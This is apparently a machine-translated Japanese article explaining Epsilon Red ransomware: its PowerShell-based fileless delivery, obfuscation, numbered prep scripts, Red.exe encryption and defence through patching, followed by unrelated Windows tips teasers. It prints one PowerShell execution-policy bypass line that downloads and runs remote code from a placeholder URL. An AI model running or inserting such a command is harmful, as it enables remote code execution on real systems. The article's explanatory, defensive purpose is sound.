Epsilon Red ランサムウェアとは何ですか?

Epsilon Red ランサムウェアとは何ですか?

サーバーにパッチを適用しましたか?

Epsilon Red と呼ばれる新しいランサムウェアの脅威は、企業データ センター内のパッチが適用されていない Microsoft ベースのサーバーを標的としています。マーベルコミックのあまり知られていない悪役にちなんで名付けられたイプシロンレッドは、最近ソフォスというサイバーセキュリティ会社によって発見されました。ランサムウェアは発見以来、世界中の多くの組織を攻撃してきました。

ファイルレス ランサムウェアは PowerShell に「隠れる」

ファイルレス ランサムウェアは、正規のソフトウェアをバンドルすることによって実行されるマルウェアの一種です。PowerShellベースのファイルレス マルウェアは、PowerShell の機能を利用してデバイスのメモリに直接ロードします。この機能は、PowerShell スクリプト内のマルウェアを検出から保護するのに役立ちます。

一般的なシナリオでは、スクリプトを実行するときは、まずデバイスのドライブにスクリプトを書き込む必要があります。これにより、エンドポイント セキュリティ ソリューションがスクリプトを検出できるようになります。 PowerShell は標準のスクリプト実行プロセスから除外されているため、エンドポイント セキュリティをバイパスする可能性があります。さらに、PowerShell スクリプトでbypassパラメーターを使用すると、攻撃者がネットワーク スクリプトの制限を回避することができます。

PowerShell バイパス パラメーターの例は次のとおりです。

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

ご覧のとおり、PowerShell バイパス パラメーターの設計は比較的簡単です。

これに応じて、Microsoft は PowerShell に関連するリモート マルウェア実行の脆弱性に対処するパッチをリリースしました。ただし、パッチは使用した分だけ効果を発揮します。多くの組織はパッチ適用基準を緩和し、環境を攻撃に対して脆弱にしています。イプシロン レッドの設計は、そのレベルの脆弱性を利用することです。

イプシロンレッドの二重の有用性

Epsilon Red はパッチが適用されていない Microsoft サーバーに対して最も効果的であるため、このマルウェアはランサムウェアおよび識別ツールとして使用される可能性があります。 Epsilon が環境内で成功するかどうかにより、攻撃者はターゲットのセキュリティ機能についてより深い洞察を得ることができます。

Epsilon が Microsoft Exchange Server へのアクセスに成功した場合、組織が一般的なパッチ適用セキュリティのベスト プラクティスに従っていないことを示します。攻撃者にとって、これはターゲットの環境の残りの部分がいかに簡単に Epsilon によって侵害される可能性があるかを示しています。

Epsilon Red は難読化を使用してペイロードを隠します。難読化によりコードが判読できなくなり、PowerShell スクリプトの可読性が高くなるのを避けるために PowerShell マルウェアで使用されます。難読化では、PowerShell エイリアスコマンドレットを使用して、ウイルス対策ソフトウェアが PowerShell ログ内の悪意のあるスクリプトを識別するのを困難にします。

Epsilon Red ランサムウェアとは何ですか?

Epsilon Red は、パッチが適用されていない Microsoft サーバーに対して最も効果的です

ただし、難読化された PowerShell スクリプトは引き続き識別できます。差し迫った PowerShell スクリプト攻撃の一般的な兆候は、WebClient オブジェクトの作成です。攻撃者は、PowerShell コードで WebClient オブジェクトを作成し、悪意のあるコードを含むリモートURLへの外部接続を確立します。

組織が攻撃された場合、難読化された PowerShell スクリプトを検出するための十分なセキュリティ対策が講じられている可能性は非常に低いです。逆に、Epsilon Red がサーバーへの侵入に失敗した場合、ターゲットのネットワークが PowerShell マルウェアを迅速に復号できることが攻撃者に示され、攻撃の価値が低くなります。

イプシロンレッドのサイバー侵入

Epsilon Red の機能は非常にシンプルです。このソフトウェアは、一連の Powershell スクリプトを使用してサーバーに侵入します。これらの PowerShell スクリプトには、1.ps1から 12.ps1までの番号が付けられます各 PowerShell スクリプトの設計は、最終ペイロード用に宛先サーバーを準備することです。

Epsilon Red のすべての PowerShell スクリプトには独自の目的があります。 Epsilon Red の PowerShell スクリプトの 1 つは、ターゲットのネットワーク ファイアウォール ルールを解決するように設計されています。このシリーズの別のソフトウェアは、ターゲットのウイルス対策ソフトウェアをアンインストールするように設計されています。

ご想像のとおり、これらのスクリプトは同期して動作し、ペイロードが配信されるとターゲットがその進行をすぐに停止できないようにします。

送信ペイロード

Epsilon の PowerShell スクリプトが最終ペイロードに移行すると、拡張機能Red.exeとして配布されます。 Red.exe はサーバーに侵入すると、サーバーのファイルをスキャンし、検出した各ファイルのディレクトリ パスのリストを作成します。リストの作成後、リスト内の各ディレクトリ パスのメイン マルウェア ファイルから子プロセスが作成されます。次に、各ランサムウェア サブファイルは、リスト ファイルからのディレクトリ パスを暗号化します。

エプソンのリストにあるすべてのフォルダー パスが暗号化された後、ターゲットに通知し、攻撃者の要求を記載する.txt ファイルが残されます。さらに、侵害されたサーバーに接続されているすべてのアクセス可能なネットワーク ノードが侵害され、マルウェアがネットワークに侵入する可能性が高まる可能性があります。

イプシロンレッドの背後にいるのは誰ですか?

Epsilon Red ランサムウェアとは何ですか?

イプシロンレッドの背後にいる攻撃者の身元はまだ不明です

イプシロン レッドの背後にいる攻撃者の身元はまだ不明です。ただし、攻撃者の出所を示す手がかりもいくつかあります。最初の手掛かりはマルウェアの名前です。イプシロン レッドは、ロシアに起源を持つ X-MEN の悪役です。

2 番目の手掛かりは、コードが残した .txt ファイルの身代金メモにあります。これは、REvil と呼ばれるランサムウェア集団が残したメモに似ています。ただし、この類似性は、攻撃者がこのギャングのメンバーであることを示すものではありません。 REvil は、関連会社がマルウェアへのアクセスに対して REvil に料金を支払う RaaS (サービスとしてのランサムウェア) オペレーションを運営しています。

イプシロンレッドから身を守る

これまでのところ、Epsilon Red はパッチが適用されていないサーバーへの侵入に成功しています。つまり、Epsilon Red や同様のランサムウェア マルウェアに対する最善の保護の 1 つは、環境が適切に管理されていることを確認することです。さらに、PowerShell スクリプトを迅速に復号できるセキュリティ ソリューションを環境に追加すると便利です。


Windows 10で欠落しているデフォルトの電源プランを復元する方法

Windows 10で欠落しているデフォルトの電源プランを復元する方法

このガイドでは、Windows 10でデフォルトの電源プラン(バランス、高パフォーマンス、省電力)を復元する方法を詳しく解説します。

Windows 10 で BlueStacks 5 の仮想化 (VT) を有効にする方法

Windows 10 で BlueStacks 5 の仮想化 (VT) を有効にする方法

仮想化を有効にするには、まず BIOS に移動し、BIOS 設定内から仮想化を有効にする必要があります。仮想化を使用することで、BlueStacks 5 のパフォーマンスが大幅に向上します。

WiFi接続に接続する際のドライバーの切断を修正

WiFi接続に接続する際のドライバーの切断を修正

WiFi 接続に接続するときにドライバーが切断されるエラーを修正する方法を解説します。

Windows での DIR コマンドの使用方法

Windows での DIR コマンドの使用方法

DIR コマンドは、特定のフォルダーに含まれるすべてのファイルとサブフォルダーを一覧表示する強力なコマンド プロンプト コマンドです。 Windows での DIR コマンドの使用方法を詳しく見てみましょう。

ソフトウェアを使わずに Windows 10 アプリをバックアップおよび復元する方法

ソフトウェアを使わずに Windows 10 アプリをバックアップおよび復元する方法

ソフトウェアなしで Windows 10 アプリをバックアップし、データを保護する方法を説明します。

Windows でローカル グループ ポリシー エディターを開くための 11 のヒント

Windows でローカル グループ ポリシー エディターを開くための 11 のヒント

Windows のローカル グループ ポリシー エディターを使用して、通知履歴の削除やアカウントロックの設定を行う方法を説明します。

最高の IP 監視ツール 10 選

最高の IP 監視ツール 10 選

重要なリソースを簡単に監視及び管理できる<strong>IP監視</strong>ソフトウェアがあります。これらのツールは、ネットワーク、インターフェイス、アプリケーションのトラフィックをシームレスに確認、分析、管理します。

AxCrypt ソフトウェアを使用してデータを暗号化する方法

AxCrypt ソフトウェアを使用してデータを暗号化する方法

AxCrypt は、データの暗号化に特化した優れたソフトウェアであり、特にデータ セキュリティに優れています。

Windows 10 Creators Updateのアップデート後にシステムフォントを変更する方法

Windows 10 Creators Updateのアップデート後にシステムフォントを変更する方法

システムフォントのサイズを変更する方法は、Windows 10のユーザーにとって非常に便利です。

Windows 10で機内モードをオフにできないエラーを修正する方法

Windows 10で機内モードをオフにできないエラーを修正する方法

最近、Windows 10にアップデートした後、機内モードをオフにできない問題について多くのユーザーから苦情が寄せられています。この記事では、Windows 10で機内モードをオフにできない問題を解決する方法を説明します。